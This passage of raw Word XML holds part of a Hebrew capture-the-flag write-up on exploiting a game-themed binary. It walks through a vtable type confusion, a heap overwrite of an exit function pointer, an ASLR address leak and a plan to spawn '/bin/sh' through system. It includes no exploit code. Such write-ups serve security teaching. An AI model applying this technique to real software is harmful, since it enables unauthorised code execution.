        </w:rPr>
        <w:t xml:space="preserve"> תוקף ובוחר ב</w:t>
      </w:r>
      <w:r>
        <w:t>acron warp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00415CEA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>(לצורך ההסבר השארתי את המיקומים כמספרים ללא שם)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E9D04" w14:textId="3E79BE29" w:rsidR="00E0224F" w:rsidRDefault="00E0224F" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0224F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F80F586" wp14:editId="558BC804">
            <wp:extent cx="5274310" cy="27476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76FD" w14:textId="6E852CD3" w:rsidR="006F11F9" w:rsidRDefault="00CB39C9" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כדי להבין נתבונן ב</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vtable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r w:rsidR="00415CEA">
        <w:t>Templar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובאזור שאחריו בז</w:t>
      </w:r>
      <w:r w:rsidR="00E0224F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>י</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כרון:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AA786" w14:textId="638EBA8F" w:rsidR="00415CEA" w:rsidRDefault="00415CEA" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00415CEA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7597D9C9" wp14:editId="24BA3665">
            <wp:extent cx="5274310" cy="2166620"/>
            <wp:effectExtent l="0" t="0" r="2540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4F98" w14:textId="16C58D6C" w:rsidR="00CB39C9" w:rsidRDefault="00CB39C9" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB39C9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E36A433" wp14:editId="4AE2D5DE">
            <wp:extent cx="5274310" cy="3046095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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1BB6" w14:textId="578222EC" w:rsidR="00415CEA" w:rsidRDefault="00E0224F" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כזכור </w:t>
      </w:r>
      <w:r>
        <w:t>this-&gt;acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בהתחלה מאותחל להיות </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Templar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עצמו. בתחילת הפונקציה (לאחר בדיקה שכעת רץ הכלי של המשתמש ולא של המחשב) בודקים האם </w:t>
      </w:r>
      <w:r>
        <w:t>this-&gt;acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא</w:t>
      </w:r>
      <w:r>
        <w:t>Templa</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עצמו</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> או לא (</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כלומר שהוא כבר הפך ל</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:t>Acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. אם הוא עדיין </w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:t>emplar</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מאפשרים לבחור מבין 3 ההתקפות האפשרות 1 גורמת לקפיצה לפונקציה התשיעית מתחילת ה</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:t>vtable</w:t>
      </w:r>
      <w:r w:rsidR="00616093">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (8*8=64) שהיא הפונקציה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368295EC" w14:textId="7BE5D2C4" w:rsidR="00616093" w:rsidRDefault="00A97A18" w:rsidP="008F46F6">
      <w:r w:rsidRPr="00A97A18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F66751C" wp14:editId="055729A8">
            <wp:extent cx="5274310" cy="1877695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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702" w14:textId="21EBDF25" w:rsidR="00A97A18" w:rsidRDefault="00A97A18" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">היוצרת </w:t>
      </w:r>
      <w:r>
        <w:t>Acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> חדש ושומרת אליו מצביע ב </w:t>
      </w:r>
      <w:r>
        <w:t>this-&gt;acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC4D9A" w14:textId="3E2AFC6D" w:rsidR="00A97A18" w:rsidRDefault="00A97A18" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עכשיו כאשר תיקרא הפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>templar_attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שוב, לא יתקיים התנאי </w:t>
      </w:r>
      <w:r>
        <w:t>this-&gt;acron</w:t>
      </w:r>
      <w:r>
        <w:t>==this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שבשורה 8</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ויודפס שיש רק אפשרות להתקפה מספר 0. </w:t>
      </w:r>
      <w:r w:rsidR="001331BA" w:rsidRPr="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>אבל</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בפועל אין בדיקה לאחר מכן שהמשתמש לא הכניס 1-3 ולכן אם בכל זאת נכניס 1-3 עדיין יתבצעו הפונקציות התשיעית, העשירית והאחת עשרה בהתאמה אבל הפעם מתחילת ה</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:t>vtable</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:t>cron</w:t>
      </w:r>
      <w:r w:rsidR="001331BA">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222B00D" w14:textId="7362FD11" w:rsidR="001331BA" w:rsidRDefault="001331BA" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>אם נסתכל על ה</w:t>
      </w:r>
      <w:r>
        <w:t>vtable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שך </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוכל לראות כי הפונקציה במרחק 64 מתחילת ה</w:t>
      </w:r>
      <w:r>
        <w:t>vtable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> היא בדיוק הפונקציה הראשונה ב</w:t>
      </w:r>
      <w:r>
        <w:t>vtable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r>
        <w:t>Ultralisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37935A2E" w14:textId="2557C9D3" w:rsidR="001331BA" w:rsidRDefault="007F1232" w:rsidP="008F46F6">
      <w:r w:rsidRPr="007F1232">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F1940B" wp14:editId="326D475F">
            <wp:extent cx="5274310" cy="1547495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73FA" w14:textId="53EB9710" w:rsidR="007F1232" w:rsidRDefault="007F1232" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ניתן לראות כתיבה ללא </w:t>
      </w:r>
      <w:r>
        <w:t>canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (כי כאן הכתיבה היא ל</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">heap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ולא ל</w:t>
      </w:r>
      <w:r>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וגם היא חסומה ב300) המאפשרת לדרוס ערכים בזכרון!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F15B6" w14:textId="19ADACA2" w:rsidR="007F1232" w:rsidRDefault="007F1232" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נשים לב ש</w:t>
      </w:r>
      <w:r w:rsidR="001A520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כאן הכתיבה תתבצע רק בתנאי ש </w:t>
      </w:r>
      <w:r>
        <w:t>g_level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לפחות 11</w:t>
      </w:r>
      <w:r w:rsidR="001A5208">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001A5208">
        <w:t>m_level</w:t>
      </w:r>
      <w:r w:rsidR="001A5208">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא גם משתנה גלובלי שמאותחל בשורה 24 של </w:t>
      </w:r>
      <w:r w:rsidR="001A5208">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="001A5208">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות 10) כלומר אנחנו צריכים להיות בשלב 12 לפחות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C4902E" w14:textId="7D65BE31" w:rsidR="001A5208" w:rsidRDefault="001A5208" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כיצד ניתן לנצל את הפרצה הנ"ל?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E5BE8" w14:textId="2F362622" w:rsidR="001A5208" w:rsidRDefault="001A5208" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נתבונן עתה בפונקציה המתבצעת כאשר המשתמש מותקף ע"י המחשב:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61BD1E" w14:textId="64A46E10" w:rsidR="001A5208" w:rsidRDefault="007D3CCC" w:rsidP="008F46F6">
      <w:r w:rsidRPr="007D3CCC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE362A6" wp14:editId="340FFE88">
            <wp:extent cx="5274310" cy="2513330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="23" name="תמונה 2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40AB" w14:textId="2B471144" w:rsidR="007D3CCC" w:rsidRDefault="007D3CCC" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אפשר לראות שאם הנתקף היה המשתמש והוא מת אזי אפשר לבחור האם לרמות ואם בחרו לרמות אזי מתבצעת קריאה לפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ששמורה כמצביע ב</w:t>
      </w:r>
      <w:r>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r>
        <w:t>Acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. (</w:t>
      </w:r>
      <w:r w:rsidR="00707259">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה</w:t>
      </w:r>
      <w:r w:rsidR="00707259">
        <w:t>member</w:t>
      </w:r>
      <w:r w:rsidR="00707259">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נמצא </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בהיסט 296 מההתחלה של האוביקט בזכרון שזה 296-32=264 מהמיקום שממנו מתחילים לכתוב)</w:t>
      </w:r>
      <w:r w:rsidR="00707259">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E1573" w14:textId="45C0596C" w:rsidR="00707259" w:rsidRDefault="00707259" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הרעיון הוא לדרוס את המצביע לפונקציה</w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (או </w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> במצביע לפונקציה אחרת ואז כאשר המשתמש ימות הפונקציה שרשמנו תתבצע.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DE1CE" w14:textId="56EF5AD2" w:rsidR="00707259" w:rsidRDefault="00707259" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>עתה כדי ליישם את זה בפועל יש 2 בעיות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C07F3" w14:textId="55A873C6" w:rsidR="00707259" w:rsidRDefault="00707259" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>א. מאחר שמופעל מנגנון ה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הכתובות של ה</w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="00D00F24">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-ים משתנות כל הזמן.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6E5277" w14:textId="79C4AB46" w:rsidR="00D07900" w:rsidRDefault="00D07900" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07900">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EBA328" wp14:editId="52DED96C">
            <wp:extent cx="4620270" cy="771633"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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C178" w14:textId="7817D6B8" w:rsidR="00D00F24" w:rsidRDefault="00D00F24" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ב. הדריסה שתארנו מאפשרת להפעיל רק פונקציה או </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אחד ללא פרמטרים. כדי להשיג משהו ממשי נצטרך להריץ פונקציה עם פרמטרים (למשל קריאה ל</w:t>
      </w:r>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם </w:t>
      </w:r>
      <w:r>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45953EB0" w14:textId="58D7C45C" w:rsidR="00D00F24" w:rsidRDefault="003666A0" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>כדי לפתור את הבעיה הראשונה נזכר בהרצה הראשונה שהיתה למעלה וההדפסה המוזרה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>is burrowed : 1043030288</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>is burrow-able? : 32570</w:t>
      </w:r>
      <w:r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1D2AA7B8" w14:textId="77777777" w:rsidR="00E3301F" w:rsidRDefault="003666A0" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נשים</w:t>
      </w:r>
      <w:r w:rsidR="00E3301F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לב</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שזה קרה כאשר היינו עם </w:t>
      </w:r>
      <w:r>
        <w:t>acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובחרנו 2. נסתכל מה רץ כאשר בוחרים 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894D636" w14:textId="10C6294A" w:rsidR="003666A0" w:rsidRDefault="003666A0" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כזכור הפונקציה להתקפה היא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219C5AC" w14:textId="3E511F34" w:rsidR="003666A0" w:rsidRDefault="003666A0" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0224F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D235C97" wp14:editId="372C6CA7">
            <wp:extent cx="5274310" cy="2747645"/>
            <wp:effectExtent l="0" t="0" r="254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D3C0" w14:textId="64343EF5" w:rsidR="007176C7" w:rsidRDefault="00E3301F" w:rsidP="00E3301F">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כלומר בבחירת 2 מתבצעת הפונקציה במרחק 72 מתחילת ה</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vtable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של </w:t>
      </w:r>
      <w:r>
        <w:t>acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שהיא הפונקציה השניה מתחילת ה</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vtable 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ltarlisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35CFFE" w14:textId="43602B73" w:rsidR="001A5208" w:rsidRDefault="00E3301F" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB39C9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116506D2" wp14:editId="3AB75311">
            <wp:extent cx="5274310" cy="3046095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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AA93" w14:textId="03A4039E" w:rsidR="00E3301F" w:rsidRDefault="00E3301F" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הפונקציה היא</w:t>
      </w:r>
      <w:r w:rsidR="00D47C7B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (הערה: לצורך ההסבר הגדרתי את </w:t>
